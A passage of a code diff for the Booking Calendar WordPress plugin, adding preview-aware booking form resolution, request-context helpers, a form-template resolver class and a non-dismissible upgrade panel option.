+	$default_options['booking_use_bfb_form'] = 'On';
 $mu_option4delete[]                      = 'booking_use_bfb_form';
 }
  	// FixIn: 10.13.1.5.
--- a/booking/includes/_capacity/create_booking.php
+++ b/booking/includes/_capacity/create_booking.php
@@ -41,20 +41,21 @@
 													'db_option_name'          => 'booking__wpbc_booking_create__request_params',    // Not necessary,  because we not save request, only sanitize it
 													'user_id'                 => $local_params['user_id'],                          // Not necessary,  because we not save request, only sanitize it
 													'request_rules_structure' => array(
-																					'resource_id' => array( 'validate' => 'd', 'default' => 1 ),                     // 'digit_or_csd'
-
-																					'aggregate_resource_id_arr' => array( 'validate' => 'digit_or_csd', 'default' => '' ),
-
-																					'dates_ddmmyy_csv' => array( 'validate' => 'csv_dates', 'default' => '' ),     // FixIn: 9.9.1.1.
-																					'formdata'         => array( 'validate' => 'strong', 'default' => '' ),
-																					'booking_hash'     => array( 'validate' => 'strong', 'default' => '' ),
-																					'custom_form'      => array( 'validate' => 'strong', 'default' => '' ),
-
-																					'captcha_chalange'   => array( 'validate' => 'strong', 'default' => '' ),
-																					'captcha_user_input' => array( 'validate' => 'strong', 'default' => '' ),
-
-																					'is_emails_send' => array( 'validate' => 'd', 'default' => 1 ),
-																					'active_locale'  => array( 'validate' => 'strong', 'default' => '' )
+																					'resource_id'               => array( 'validate' => 'd', 'default' => 1 ),    // 'digit_or_csd'.
+																					'aggregate_resource_id_arr' => array( 'validate' => 'digit_or_csd', 'default'  => '' ),
+																					'dates_ddmmyy_csv'          => array( 'validate' => 'csv_dates', 'default'  => '' ), // FixIn: 9.9.1.1.
+																					'formdata'                  => array( 'validate' => 'strong', 'default'  => '' ),
+																					'booking_hash'              => array( 'validate' => 'strong', 'default'  => '' ),
+																					'custom_form'               => array( 'validate' => 'strong', 'default'  => '' ),
+																					'captcha_chalange'          => array( 'validate' => 'strong', 'default'  => '' ),
+																					'captcha_user_input'        => array( 'validate' => 'strong', 'default'  => '' ),
+																					'is_emails_send'            => array( 'validate' => 'd', 'default' => 1 ),
+																					'active_locale'             => array( 'validate' => 'strong', 'default'  => '' ),
+																					'form_status'               => array( 'validate' => 'strong', 'default'  => 'published' ),
+																					'wpbc_bfb_preview'          => array( 'validate' => 'd', 'default'  => 0 ),
+																					'wpbc_bfb_preview_token'    => array( 'validate' => 'strong', 'default'  => '' ),
+																					'wpbc_bfb_preview_form_id'  => array( 'validate' => 'd', 'default'  => 0 ),
+																					'wpbc_bfb_preview_nonce'    => array( 'validate' => 'strong', 'default'  => '' ),
 																				)
 												));

@@ -90,20 +91,24 @@
 	// </editor-fold>

 	$server_http_referer_uri = ( ( isset( $_SERVER['HTTP_REFERER'] ) ) ? sanitize_text_field( $_SERVER['HTTP_REFERER'] ) : '' );  /* phpcs:ignore WordPress.Security.NonceVerification.Missing, WordPress.Security.ValidatedSanitizedInput.MissingUnslash */ /* FixIn: sanitize_unslash */
+
 	$request_save_params = array(
-									'resource_id'               => $request_params['resource_id'],
-									'dates_ddmmyy_csv'          => $request_params['dates_ddmmyy_csv'],
-									'form_data'                 => $request_params['formdata'],
-									'aggregate_resource_id_arr' => $request_params['aggregate_resource_id_arr'],        // Optional  can  be ''
-
-									'booking_hash'        => $request_params['booking_hash'],
-									'custom_form'         => $request_params['custom_form'],
-
-									'is_emails_send'       => $request_params['is_emails_send'],
-									'is_show_payment_form' => 1,
-									'user_id'              => $local_params['user_id'],
-									'request_uri'          => $server_http_referer_uri
-							);
+		'resource_id'               => $request_params['resource_id'],
+		'dates_ddmmyy_csv'          => $request_params['dates_ddmmyy_csv'],
+		'form_data'                 => $request_params['formdata'],
+		'aggregate_resource_id_arr' => $request_params['aggregate_resource_id_arr'],        // Optional  can  be ''.
+		'booking_hash'              => $request_params['booking_hash'],
+		'custom_form'               => $request_params['custom_form'],
+		'is_emails_send'            => $request_params['is_emails_send'],
+		'is_show_payment_form'      => 1,
+		'user_id'                   => $local_params['user_id'],
+		'request_uri'               => $server_http_referer_uri,
+		'form_status'               => $request_params['form_status'],
+		'wpbc_bfb_preview'          => $request_params['wpbc_bfb_preview'],
+		'wpbc_bfb_preview_token'    => $request_params['wpbc_bfb_preview_token'],
+		'wpbc_bfb_preview_form_id'  => $request_params['wpbc_bfb_preview_form_id'],
+		'wpbc_bfb_preview_nonce'    => $request_params['wpbc_bfb_preview_nonce'],
+	);
 	$booking_save_arr = wpbc_booking_save( $request_save_params );

 	// <editor-fold     defaultstate="collapsed"                        desc=" :: ERROR :: <-  BOOKING "  >
@@ -255,12 +260,33 @@
 								'is_approve_booking'                => array( 'validate' => 'd',      'default' => 0 ),       // 0 | 1
 								'save_booking_even_if_unavailable'  => array( 'validate' => 'd',      'default' => 0 ),       // 0 | 1
 								'sync_gid'                          => array( 'validate' => 'strong', 'default' => '' ),
-								'is_use_booking_recurrent_time'     => array( 'validate' => 'd',      'default' => intval( ( 'On' === get_bk_option( 'booking_recurrent_time' ) ) ) )
+								'is_use_booking_recurrent_time'     => array( 'validate' => 'd',      'default' => intval( ( 'On' === get_bk_option( 'booking_recurrent_time' ) ) ) ),
+
+								'form_status' => array( 'validate' => 'strong', 'default' => 'published' ),
+								'wpbc_bfb_preview'         => array( 'validate' => 'd',      'default' => 0 ),
+								'wpbc_bfb_preview_token'   => array( 'validate' => 'strong', 'default' => '' ),
+								'wpbc_bfb_preview_form_id' => array( 'validate' => 'd',      'default' => 0 ),
+								'wpbc_bfb_preview_nonce'   => array( 'validate' => 'strong', 'default' => '' ),
 						);
 	$re_cleaned_params = wpbc_sanitize_params_in_arr( $request_params, $validate_arr_rules );

 	$admin_uri = ltrim( str_replace( get_site_url( null, '', 'admin' ), '', admin_url( 'admin.php?' ) ), '/' );         // wp-admin/admin.php?

+	$re_cleaned_params['form_status'] = sanitize_key( $re_cleaned_params['form_status'] );
+	if ( 'preview' !== $re_cleaned_params['form_status'] ) {
+		$re_cleaned_params['form_status'] = 'published';
+	}
+	// FixIn: 2026-02-05 - make preview/published available to form parsing/templates during this request.
+	wpbc_set_request_form_context(
+		array(
+			'form_status'              => $re_cleaned_params['form_status'],
+			'user_id'                  => $re_cleaned_params['user_id'],
+			'wpbc_bfb_preview'         => absint( $re_cleaned_params['wpbc_bfb_preview'] ),
+			'wpbc_bfb_preview_token'   => sanitize_key( $re_cleaned_params['wpbc_bfb_preview_token'] ),
+			'wpbc_bfb_preview_form_id' => absint( $re_cleaned_params['wpbc_bfb_preview_form_id'] ),
+			'wpbc_bfb_preview_nonce'   => (string) $re_cleaned_params['wpbc_bfb_preview_nonce'],
+		)
+	);

 	// -----------------------------------------------------------------------------------------------------------------
 	// Local parameters
@@ -746,6 +772,7 @@
 														, - 2 * $php_performance['total'] );                            // PERFORMANCE OTHER - after TOTAL
 																														// </editor-fold>

+	wpbc_clear_request_form_context();

 	return array(	'ajx_data'        => $ajx_data_arr,                         // [ 'status' => "ok", 'wpbc_payment_output' => "<p>Dear John<br..." ]
 					'booking_id'      => $booking_new_arr['booking_id'],        // 254
@@ -1151,6 +1178,21 @@
 			return $insert_dates_arr;
 		}

+// == Help  functions ==
+function wpbc_set_request_form_context( $ctx ) {
+	$GLOBALS['wpbc_request_form_context'] = ( is_array( $ctx ) ) ? $ctx : array();
+}
+
+function wpbc_get_request_form_context() {
+	return ( isset( $GLOBALS['wpbc_request_form_context'] ) && is_array( $GLOBALS['wpbc_request_form_context'] ) )
+		? $GLOBALS['wpbc_request_form_context'] : array();
+}
+
+function wpbc_clear_request_form_context() {
+	if ( isset( $GLOBALS['wpbc_request_form_context'] ) ) {
+		unset( $GLOBALS['wpbc_request_form_context'] );
+	}
+}

 // ---------------------------------------------------------------------------------------------------------------------
 // Support
--- a/booking/includes/_functions/booking_data__parse.php
+++ b/booking/includes/_functions/booking_data__parse.php
@@ -1,16 +1,17 @@
 <?php
 /**
-* @version 1.0
-* @package Booking Calendar
-* @subpackage  Booking Data Parsing functions
-* @category    Functions
-*
-* @author wpdevelop
-* @link https://wpbookingcalendar.com/
-* @email info@wpbookingcalendar.com
-*
-* @modified 2024-05-14
-*/
+ * @version     1.0
+ * @package     Booking Calendar
+ * @subpackage  Booking Data Parsing functions
+ * @category    Functions
+ *
+ * @author      wpdevelop
+ * @link        https://wpbookingcalendar.com/
+ * @email info@wpbookingcalendar.com
+ *
+ * @modified    2024-05-14
+ * @file        ../includes/_functions/booking_data__parse.php
+ */

 if ( ! defined( 'ABSPATH' ) ) exit;                                             // Exit if accessed directly

@@ -272,7 +273,7 @@
 				);
 	$params   = wp_parse_args( $params, $defaults );

-	$booking_form_show = wpbc_get__booking_form_data_configuration( $resource_id, $form_data );
+	$booking_form_show = wpbc_get__booking_form_data_configuration( $resource_id, $form_data, $params );

 	$booking_data_arr  = wpbc_get_parsed_booking_data_arr( $form_data, $resource_id, array( 'get' => 'value' ) );

@@ -396,6 +397,50 @@
 	return $booking_form_configuration;
 }

+
+/**
+ * Load BFB preview payload from transient (for booking created inside preview iframe).
+ *
+ * @param array $ctx
+ * @return array|null
+ */
+function wpbc_bfb_preview__maybe_get_payload_from_context( $ctx ) {
+
+	$ctx = ( is_array( $ctx ) ) ? $ctx : array();
+
+	$user_id = isset( $ctx['user_id'] ) ? absint( $ctx['user_id'] ) : 0;
+	$form_id = isset( $ctx['wpbc_bfb_preview_form_id'] ) ? absint( $ctx['wpbc_bfb_preview_form_id'] ) : 0;
+	$token   = isset( $ctx['wpbc_bfb_preview_token'] ) ? sanitize_key( $ctx['wpbc_bfb_preview_token'] ) : '';
+	$nonce   = isset( $ctx['wpbc_bfb_preview_nonce'] ) ? sanitize_text_field( $ctx['wpbc_bfb_preview_nonce'] ) : '';
+
+	if ( $user_id <= 0 || $form_id <= 0 || '' === $token ) {
+		return null;
+	}
+
+	// Optional hardening: verify nonce if present.
+	if ( '' !== $nonce ) {
+		if ( ! wp_verify_nonce( $nonce, 'wpbc_bfb_preview_' . $token ) ) {
+			return null;
+		}
+	}
+
+	// Optional hardening: capability check (preview is admin-only anyway).
+	$cap = ( function_exists( 'wpbc_bfb_get_manage_cap' ) ) ? wpbc_bfb_get_manage_cap() : 'manage_options';
+	if ( ! is_user_logged_in() || ! current_user_can( $cap ) ) {
+		return null;
+	}
+
+	$transient_key = 'wpbc_bfb_preview_' . $user_id . '_' . $form_id . '_' . $token;
+
+	$data = get_transient( $transient_key );
+	if ( empty( $data ) || ! is_array( $data ) ) {
+		return null;
+	}
+
+	return $data;
+}
+
+
 /**
  * Get configuration  of 'BOOKING FORM DATA'  from  -  Booking > Settings > Form page
  *
@@ -410,13 +455,49 @@
  *
  * @return string
  */
-function wpbc_get__booking_form_data_configuration( $resource_id = 1, $form_data = '' ) {
+/**
+ * Get configuration  of 'BOOKING FORM DATA'  from  -  Booking > Settings > Form page
+ *
+ *        - 1.    <= BS : 'Booking form show' configuration    from standard form in versions up to  Business Small version ,
+ *        - 2     >= BM : If form data has field of custom form, then from custom form configuration,
+ *        - 3     >= BM : Otherwise if resource has default custom  booking form,  then  from  this default custom  booking form
+ *        - 4      = MU :  specific form of specific WP User
+ *        - 5   finally : simple standard form
+ *
+ * @param int    $resource_id
+ * @param string $form_data  Form data here, required in >= BM.
+ *
+ * @return string
+ */
+function wpbc_get__booking_form_data_configuration( $resource_id = 1, $form_data = '', $params = array() ) {
+
+	// FixIn: 2026-02-05 - allow preview booking submissions to use preview "content_form".
+	$ctx = wp_parse_args( ( is_array( $params ) ? $params : array() ), wpbc_get_request_form_context() );
+
+	$form_status = ( isset( $ctx['form_status'] ) ) ? sanitize_key( $ctx['form_status'] ) : 'published';
+
+	if ( 'preview' === $form_status ) {
+
+		$payload = wpbc_bfb_preview__maybe_get_payload_from_context( $ctx );
+
+		// content_form is exactly the "Booking form show" template exported for preview session.
+		if ( ! empty( $payload ) && isset( $payload['content_form'] ) && ( '' !== (string) $payload['content_form'] ) ) {
+			return (string) $payload['content_form'];
+		}
+	}
+
+	$resource_id          = (int) $resource_id;
+	$form_data            = (string) $form_data;
+	$my_booking_form_name = 'standard';

 	if ( ! class_exists( 'wpdev_bk_personal' ) ) {

 		$booking_form_show = wpbc_simple_form__get_form_show__as_shortcodes();
 		$booking_form_show = wpbc_bf__replace_custom_html_shortcodes( $booking_form_show );

+		// Try BFB (if available) even in this branch (safe no-op if not loaded).
+		$booking_form_show = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $my_booking_form_name, $form_data, $ctx );
+
 	} else {

 		$booking_form_show = get_bk_option( 'booking_form_show' );
@@ -424,34 +505,53 @@

 		if ( class_exists( 'wpdev_bk_biz_m' ) ) {

-			if ( false !== strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) ) {                        // FixIn: 9.4.3.12.
+			if ( false !== strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) ) { // FixIn: 9.4.3.12.
+
+				$custom_booking_form_name = substr(
+					$form_data,
+					strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) + strlen( 'wpbc_custom_booking_form' . $resource_id . '^' )
+				);

-				$custom_booking_form_name = substr( $form_data, strpos( $form_data, 'wpbc_custom_booking_form' . $resource_id . '^' ) + strlen( 'wpbc_custom_booking_form' . $resource_id . '^' ) );
 				if ( false !== strpos( $custom_booking_form_name, '~' ) ) {
 					$custom_booking_form_name = substr( $custom_booking_form_name, 0, strpos( $custom_booking_form_name, '~' ) );
 				}
+
 				$booking_form_show    = apply_bk_filter( 'wpdev_get_booking_form_content', $booking_form_show, $custom_booking_form_name );
 				$my_booking_form_name = $custom_booking_form_name;
+
 			} else {

-				// BM :: Get default Custom Form  of Resource
+				// BM :: Get default Custom Form of Resource.
 				$my_booking_form_name = apply_bk_filter( 'wpbc_get_default_custom_form', 'standard', $resource_id );
 				if ( ( $my_booking_form_name != 'standard' ) && ( ! empty( $my_booking_form_name ) ) ) {
 					$booking_form_show = apply_bk_filter( 'wpdev_get_booking_form_content', $booking_form_show, $my_booking_form_name );
 				}
 			}

-			//MU :: if resource of "Regular User" - then  GET STANDARD user form ( if ( get_bk_option( 'booking_is_custom_forms_for_regular_users' ) !== 'On' ) )
-			$booking_form_show = apply_bk_filter( 'wpbc_multiuser_get_booking_form_show_of_regular_user', $booking_form_show, $resource_id, $my_booking_form_name );    // FixIn: 8.1.3.19.
+			// MU :: if resource of "Regular User" - then GET STANDARD user form.
+			$booking_form_show = apply_bk_filter( 'wpbc_multiuser_get_booking_form_show_of_regular_user', $booking_form_show, $resource_id, $my_booking_form_name ); // FixIn: 8.1.3.19.
+
+			/**
+			 * IMPORTANT:
+			 * Try BFB DB "content_form" (resolver-driven) BEFORE MU regular-user override,
+			 * so MU filter can still enforce standard form when required.
+			 */
+			$booking_form_show = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $my_booking_form_name, $form_data, $ctx );
+
+		} else {
+
+			// Try BFB also for non-BM paid branches (safe).
+			$booking_form_show = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $my_booking_form_name, $form_data, $ctx );
 		}
 	}

-	// Language
+	// Language.
 	$booking_form_show = wpbc_lang( $booking_form_show );

 	return $booking_form_show;
 }

+
 // -------------------------------------------------------------------------------------------------------------

 /**
@@ -473,6 +573,62 @@
 	return $new__form_data__str;
 }

+/**
+ * Get booking form pair (fields + show template) for listing/inspection purposes,
+ * but allow BFB resolver to override legacy options.
+ *
+ * @param int    $resource_id
+ * @param string $form_name
+ * @param array  $ctx
+ *
+ * @return array { form:string, content:string }
+ */
+function wpbc_get__booking_form_pair__for_field_names_listing( $resource_id = 1, $form_name = 'standard', $ctx = array() ) {
+
+	$pair = array(
+		'form'    => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form' ) ),
+		'content' => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form_show' ) ),
+	);
+
+	// Let BFB override both "form" and "content" if available.
+	if ( class_exists( 'WPBC_BFB_Booking_Data_Content_Resolver' ) ) {
+
+		// Recommended: add this method to the resolver (see section 3 below).
+		if ( method_exists( 'WPBC_BFB_Booking_Data_Content_Resolver', 'maybe_override_booking_form_pair_by_bfb' ) ) {
+			$pair = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_pair_by_bfb(
+				$pair,
+				(int) $resource_id,
+				(string) $form_name,
+				'',       // no form_data here
+				(is_array( $ctx ) ? $ctx : array())
+			);
+		} else {
+			// Fallback: at least keep content resolved by BFB (you already have this method).
+			if ( method_exists( 'WPBC_BFB_Booking_Data_Content_Resolver', 'maybe_override_booking_form_show_by_bfb' ) ) {
+				$pair['content'] = WPBC_BFB_Booking_Data_Content_Resolver::maybe_override_booking_form_show_by_bfb(
+					$pair['content'],
+					(int) $resource_id,
+					(string) $form_name,
+					'',
+					(is_array( $ctx ) ? $ctx : array())
+				);
+			}
+		}
+	}
+
+	// Normalize keys.
+	if ( ! isset( $pair['form'] ) ) {
+		$pair['form'] = '';
+	}
+	if ( ! isset( $pair['content'] ) ) {
+		$pair['content'] = '';
+	}
+
+	$pair['form']    = (string) $pair['form'];
+	$pair['content'] = (string) $pair['content'];
+
+	return $pair;
+}

 /**
  * Get arr   of all Fields Names 	from  all booking forms  (including custom)
@@ -515,7 +671,17 @@
 function wpbc_get__in_all_forms__field_names_arr() {

 	$booking_form_fields_arr   = array();
-	$booking_form_fields_arr[] = array( 'name' => 'standard', 'form' => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form' ) ), 'content' => wpbc_bf__replace_custom_html_shortcodes( get_bk_option( 'booking_form_show' ) ) );
+	$ctx = wpbc_get_request_form_context();
+
+	$ctx['form_status'] = 'published';
+
+	$pair = wpbc_get__booking_form_pair__for_field_names_listing( 1, 'standard', $ctx );
+
+	$booking_form_fields_arr[] = array(
+		'name'    => 'standard',
+		'form'    => $pair['form'],
+		'content' => $pair['content'],
+	);

 	/**
 	 * Get custom booking form configurations: [
--- a/booking/includes/_functions/versions.php
+++ b/booking/includes/_functions/versions.php
@@ -444,7 +444,8 @@
 						'upgrade_link' 		 => array( 'title' => 'Upgrade to Pro', 'relative_url' => 'features/#bk_news_section' ),
 						'versions'     		 => 'Business Large, MultiUser versions',
 						'css'          		 => 'transform: translate(0) translateY(120px);',
-						'dismiss_css_class'  => ''																//'.wpbc_random_' . round( microtime( true ) * 1000 ), //'.'.$id . '_' . 'weekdays_conditions'
+						'dismiss_css_class'  => '',																//'.wpbc_random_' . round( microtime( true ) * 1000 ), //'.'.$id . '_' . 'weekdays_conditions'
+						'no_dismiss'         => false
 				);
 	$params = wp_parse_args( $params, $defaults );
 	$up_id = $params['id'];
@@ -457,18 +458,23 @@

 	if ( $is_blured ) {

-		// ---------------------------------------------------------------------------------------------------------
-		// Is dismissed ?
-		// ---------------------------------------------------------------------------------------------------------
-		ob_start();
-		$is_upgrade_panel_visible = wpbc_is_dismissed( $up_id , array(
-																	'title' => '<span aria-hidden="true" style="font-size: 28px;">×</span>',
-																	'hint'  => __( 'Dismiss', 'booking' ),
-																	'class' => 'wpbc_panel_get_started_dismiss',
-																	'css'   => '',
-																	'dismiss_css_class' => $params['dismiss_css_class']
-															) );
-		$html_dismiss_btn = ob_get_clean();
+		if ( $params['no_dismiss'] ) {
+			$is_upgrade_panel_visible = true;
+			$html_dismiss_btn         = '';
+		} else {
+			// ---------------------------------------------------------------------------------------------------------
+			// Is dismissed ?
+			// ---------------------------------------------------------------------------------------------------------
+			ob_start();
+			$is_upgrade_panel_visible = wpbc_is_dismissed( $up_id , array(
+																		'title' => '<span aria-hidden="true" style="font-size: 28px;">×</span>',
+																		'hint'  => __( 'Dismiss', 'booking' ),
+																		'class' => 'wpbc_panel_get_started_dismiss',
+																		'css'   => '',
+																		'dismiss_css_class' => $params['dismiss_css_class']
+																) );
+			$html_dismiss_btn = ob_get_clean();
+		}

 		// ---------------------------------------------------------------------------------------------------------
 		// Upgrade Widget
--- a/booking/includes/fontend/class-fe-form-source-resolver.php
+++ b/booking/includes/fontend/class-fe-form-source-resolver.php
@@ -70,7 +70,6 @@
 	 *  - resource_id (int)
 	 *  - form_slug (string)  // from shortcode form_type
 	 *  - form_status (string) // published|preview
-	 *  - context (string) // frontend|preview|backend (optional)
 	 *  - custom_params (array) // parsed from options parser
 	 *  - legacy_instance (wpdev_booking|null) // optional
 	 *
@@ -91,7 +90,6 @@
 		$resource_id     = isset( $req['resource_id'] ) ? (int) $req['resource_id'] : 0;
 		$form_slug_raw   = isset( $req['form_slug'] ) ? (string) $req['form_slug'] : '';
 		$form_status_raw = isset( $req['form_status'] ) ? (string) $req['form_status'] : '';
-		$context         = isset( $req['context'] ) ? sanitize_key( (string) $req['context'] ) : 'frontend';
 		$custom_params   = ( isset( $req['custom_params'] ) && is_array( $req['custom_params'] ) ) ? $req['custom_params'] : array();

 		$legacy_instance = isset( $req['legacy_instance'] ) ? $req['legacy_instance'] : null;
@@ -99,23 +97,13 @@
 		// ---------------------------------------------------------------------
 		// Step A: determine slug + status (contract).
 		// ---------------------------------------------------------------------
-		$form_slug = sanitize_key( $form_slug_raw );
+		$form_slug = sanitize_text_field( $form_slug_raw );
 		if ( '' === $form_slug ) {
 			$form_slug = 'standard';
 		}

 		$status = sanitize_key( $form_status_raw );

-		// Backward compat: if no explicit status but options/context says preview.
-		if ( '' === $status ) {
-			if ( ( ! empty( $custom_params['context'] ) ) && ( 'preview' === sanitize_key( (string) $custom_params['context'] ) ) ) {
-				$status = 'preview';
-			}
-		}
-		if ( '' === $status && 'preview' === $context ) {
-			$status = 'preview';
-		}
-
 		// Normalize synonyms.
 		if ( in_array( $status, array( 'publish', 'published' ), true ) ) {
 			$status = 'published';
@@ -132,7 +120,7 @@
 		}

 		// If BFB runtime is not present => legacy only.
-		if ( ! function_exists( 'wpbc_bfb_get_booking_form_source' ) ) {
+		if ( ! class_exists( 'WPBC_BFB_Form_Loader' ) ) {
 			return self::fallback_to_legacy_or_simple( $legacy_instance );
 		}

@@ -182,7 +170,7 @@
 			$req
 		);

-		// Try: (slug,status,owner_user_id) then (slug,status,global)
+		// Try: (slug,status,owner_user_id) then (slug,status,global)   Return like this:     $found = [ "form_id":1,  "form_slug":"standard",  "status":"published",  "owner_user_id":0 ]
 		$found = self::try_find_row( $form_slug, $status, $owner_user_id, $fallback_chain );
 		if ( ! $found && ( $owner_user_id > 0 ) ) {
 			$found = self::try_find_row( $form_slug, $status, 0, $fallback_chain );
@@ -205,7 +193,6 @@
 				'status'         => (string) $found['status'],
 				'owner_user_id'  => (int) $found['owner_user_id'],
 				'resource_id'    => (int) $resource_id,
-				'context'        => (string) $context,
 			);

 			// Pass form_id if known (fast, deterministic).
@@ -249,7 +236,7 @@
 	 */
 	private static function try_find_row( $slug, $status, $owner_user_id, &$chain ) {

-		$slug          = sanitize_key( (string) $slug );
+		$slug          = sanitize_text_field( (string) $slug );
 		$status        = sanitize_key( (string) $status );
 		$owner_user_id = max( 0, (int) $owner_user_id );

@@ -299,3 +286,257 @@
 		);
 	}
 }
+
+
+/**
+ * BFB resolver for "Booking Form Data" template (content_form).
+ *
+ * Purpose:
+ * - When BFB DB engine is used for a form, the correct booking "data template"
+ *   must come from wp_booking_form_structures.content_form (not booking_form_show option).
+ * - This is used by wpbc_get__booking_form_data__show() to replace [field] shortcodes
+ *   with values from booking form_data string.
+ *
+ * Design notes:
+ * - Uses WPBC_FE_Form_Source_Resolver::resolve() to keep the same decision chain as front-end rendering.
+ * - Reads the template via wpbc_bfb_get_booking_form_pair() (must expose content_form).
+ * - Safe no-op when BFB / resolver is not available.
+ *
+ * @since 11.0.x
+ */
+class WPBC_BFB_Booking_Data_Content_Resolver {
+
+	/**
+	 * Try to override legacy $booking_form_show by BFB content_form (resolver-driven).
+	 *
+	 * @param string $booking_form_show Legacy resolved booking_form_show.
+	 * @param int    $resource_id       Booking resource ID.
+	 * @param string $form_slug         Form slug/name (legacy: 'standard' or custom form name).
+	 * @param string $form_data         Booking form_data string from DB.
+	 * @param array  $params            Optional. Context override (e.g. form_status/preview token).
+	 *
+	 * @return string Possibly overridden template.
+	 */
+	public static function maybe_override_booking_form_show_by_bfb( $booking_form_show, $resource_id, $form_slug, $form_data, $params = array() ) {
+
+		$booking_form_show = (string) $booking_form_show;
+		$resource_id       = (int) $resource_id;
+		$form_slug         = (string) $form_slug;
+		$form_data         = (string) $form_data;
+
+		if ( '' === $form_slug ) {
+			$form_slug = 'standard';
+		}
+
+		// Hard requirements for BFB resolver path.
+		if ( ! class_exists( 'WPBC_FE_Form_Source_Resolver' ) ) {
+			return $booking_form_show;
+		}
+		if ( ! class_exists( 'WPBC_BFB_Form_Loader' ) ) {
+			return $booking_form_show;
+		}
+
+		// ------------------------------------------------------------
+		// Preview-aware context (critical fix).
+		// ------------------------------------------------------------
+		$ctx = array();
+		if ( function_exists( 'wpbc_get_request_form_context' ) ) {
+			$ctx = wpbc_get_request_form_context();
+		}
+		$ctx = wp_parse_args( ( is_array( $params ) ? $params : array() ), ( is_array( $ctx ) ? $ctx : array() ) );
+
+		$form_status = ( isset( $ctx['form_status'] ) ) ? sanitize_key( $ctx['form_status'] ) : 'published';
+		if ( in_array( $form_status, array( 'publish', 'published' ), true ) ) {
+			$form_status = 'published';
+		}
+		if ( 'preview' !== $form_status ) {
+			$form_status = 'published';
+		}
+
+		// If preview session has exported content_form payload => use it (fast + correct).
+		if ( ( 'preview' === $form_status ) && function_exists( 'wpbc_bfb_preview__maybe_get_payload_from_context' ) ) {
+
+			$payload = wpbc_bfb_preview__maybe_get_payload_from_context( $ctx );
+
+			if ( ! empty( $payload ) && isset( $payload['content_form'] ) && ( '' !== (string) $payload['content_form'] ) ) {
+
+				$content_form = (string) $payload['content_form'];
+
+				// Keep legacy behavior: custom html shortcodes + language.
+				$content_form = wpbc_bf__replace_custom_html_shortcodes( $content_form );
+				$content_form = wpbc_lang( $content_form );
+
+				return $content_form;
+			}
+		}
+
+		// ------------------------------------------------------------
+		// Resolver-driven DB load (status must NOT be hard-coded).
+		// ------------------------------------------------------------
+		$custom_params = array();
+
+		// Optional: allow future-proof explicit form_id embedded into booking form_data.
+		$bfb_form_id = self::get_bfb_form_id_from_form_data( $form_data, $resource_id );
+		if ( $bfb_form_id > 0 ) {
+			$custom_params['bfb_form_id'] = (int) $bfb_form_id;
+		}
+
+		$req = array(
+			'resource_id'     => $resource_id,
+			'form_slug'       => $form_slug,
+			'form_status'     => $form_status, // <-- critical: use preview/published
+			'custom_params'   => $custom_params,
+			'legacy_instance' => null,
+
+			// Future-proof: let filters access the full preview context if they need it.
+			'ctx'             => $ctx,
+		);
+
+		$resolved = WPBC_FE_Form_Source_Resolver::resolve( $req );
+
+		// If preview status is requested but nothing found, try published as fallback (keeps BFB).
+		if ( ( empty( $resolved['engine'] ) || ( 'bfb_db' !== $resolved['engine'] ) ) && ( 'preview' === $form_status ) ) {
+			$req['form_status'] = 'published';
+			$resolved = WPBC_FE_Form_Source_Resolver::resolve( $req );
+		}
+
+		if ( empty( $resolved['engine'] ) || ( 'bfb_db' !== $resolved['engine'] ) ) {
+			return $booking_form_show;
+		}
+
+		$bfb_loader_args = array();
+		if ( ! empty( $resolved['bfb_loader_args'] ) && is_array( $resolved['bfb_loader_args'] ) ) {
+			$bfb_loader_args = $resolved['bfb_loader_args'];
+		}
+
+		// Keep old behavior: allow explicit override from booking data (if present).
+		if ( ( $bfb_form_id > 0 ) && empty( $bfb_loader_args['form_id'] ) ) {
+			$bfb_loader_args['form_id'] = (int) $bfb_form_id;
+		}
+
+		// Signal loader that we need the "content_form" (booking fields data template).
+		$bfb_loader_args['return'] = 'content_form';
+
+		$bfb_pair = wpbc_bfb_get_booking_form_pair( $bfb_loader_args );
+
+		$content_form = self::extract_content_form_from_pair( $bfb_pair );
+
+		if ( '' === trim( $content_form ) ) {
+			return $booking_form_show;
+		}
+
+		// Keep legacy behavior: custom html shortcodes + language.
+		$content_form = wpbc_bf__replace_custom_html_shortcodes( $content_form );
+		$content_form = wpbc_lang( $content_form );
+
+		return $content_form;
+	}
+
+
+	/**
+	 * Extract content template from loader return (supports multiple formats).
+	 *
+	 * Supported formats:
+	 * 1) array( 'content' => '...' )                                  <- current WPBC_BFB_Form_Loader output
+	 * 2) array( 'content_form' => '...' )                             <- optional future alias
+	 * 3) array( 'form' => array( 'content' => '...' ) )               <- future-proof
+	 * 4) array( 'form' => array( 'content_form' => '...' ) )          <- future-proof
+	 *
+	 * @param mixed $bfb_pair Loader result.
+	 *
+	 * @return string
+	 */
+	private static function extract_content_form_from_pair( $bfb_pair ) {
+
+		if ( ! is_array( $bfb_pair ) ) {
+			return '';
+		}
+
+		/**
+		 * Safety: if loader fell back to legacy, do NOT override booking_form_show.
+		 * WPBC_BFB_Form_Loader returns 'source' => 'builder'|'legacy'.
+		 */
+		if ( isset( $bfb_pair['source'] ) && ( 'builder' !== $bfb_pair['source'] ) ) {
+			return '';
+		}
+
+		// Current loader output key.
+		if ( isset( $bfb_pair['content'] ) && is_string( $bfb_pair['content'] ) ) {
+			return (string) $bfb_pair['content'];
+		}
+
+		// Optional alias (if some implementations already return it).
+		if ( isset( $bfb_pair['content_form'] ) && is_string( $bfb_pair['content_form'] ) ) {
+			return (string) $bfb_pair['content_form'];
+		}
+
+		// Future-proof nested formats.
+		if ( isset( $bfb_pair['form'] ) && is_array( $bfb_pair['form'] ) ) {
+
+			if ( isset( $bfb_pair['form']['content'] ) && is_string( $bfb_pair['form']['content'] ) ) {
+				return (string) $bfb_pair['form']['content'];
+			}
+
+			if ( isset( $bfb_pair['form']['content_form'] ) && is_string( $bfb_pair['form']['content_form'] ) ) {
